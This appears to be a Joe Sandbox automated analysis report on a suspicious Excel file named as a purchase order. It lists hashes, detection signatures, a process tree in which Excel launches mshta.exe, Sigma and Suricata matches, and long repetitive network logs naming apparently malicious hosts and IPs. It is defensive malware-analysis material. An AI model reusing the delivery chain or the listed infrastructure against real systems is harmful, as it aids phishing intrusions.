Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
PURCHASE ORDER 517-2025.xla.xlsx

Overview

General Information

Sample name:PURCHASE ORDER 517-2025.xla.xlsx
Analysis ID:1649448
MD5:4d57f2dfe4050bf6605af3c1be23d9e2
SHA1:db1b4d7cd15f21378a456e7fdf49648b39ba731a
SHA256:2edf703005001488ac02fe1c1b08784c938d944a5e8dd4345b00ea3d6e7b68f6
Tags:xlaxlsxuser-abuse_ch
Infos:

Detection

Score:56
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6532 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 3896 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 5696 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 5128 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PURCHASE ORDER 517-2025.xla.xlsx" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 6532, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 3896, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 147.79.86.93, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6532, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49697
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.7, DestinationIsIpv6: false, DestinationPort: 49697, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6532, Protocol: tcp, SourceIp: 147.79.86.93, SourceIsIpv6: false, SourcePort: 443

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-26T19:36:22.329042+010020283713Unknown Traffic192.168.2.74969913.107.246.41443TCP
2025-03-26T19:36:28.787705+010020283713Unknown Traffic192.168.2.74970013.107.246.41443TCP
2025-03-26T19:36:28.789320+010020283713Unknown Traffic192.168.2.74970113.107.246.41443TCP

Joe Sandbox Signatures

  • AV Detection
  • Compliance
  • Software Vulnerabilities
  • Networking
  • System Summary
  • Hooking and other Techniques for Hiding and Protection
  • Malware Analysis System Evasion

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: PURCHASE ORDER 517-2025.xla.xlsxVirustotal: Detection: 28%Perma Link
Source: PURCHASE ORDER 517-2025.xla.xlsxReversingLabs: Detection: 22%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 147.79.86.93:443 -> 192.168.2.7:49697 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.7:49699 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
Source: global trafficDNS query: name: agr.my
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
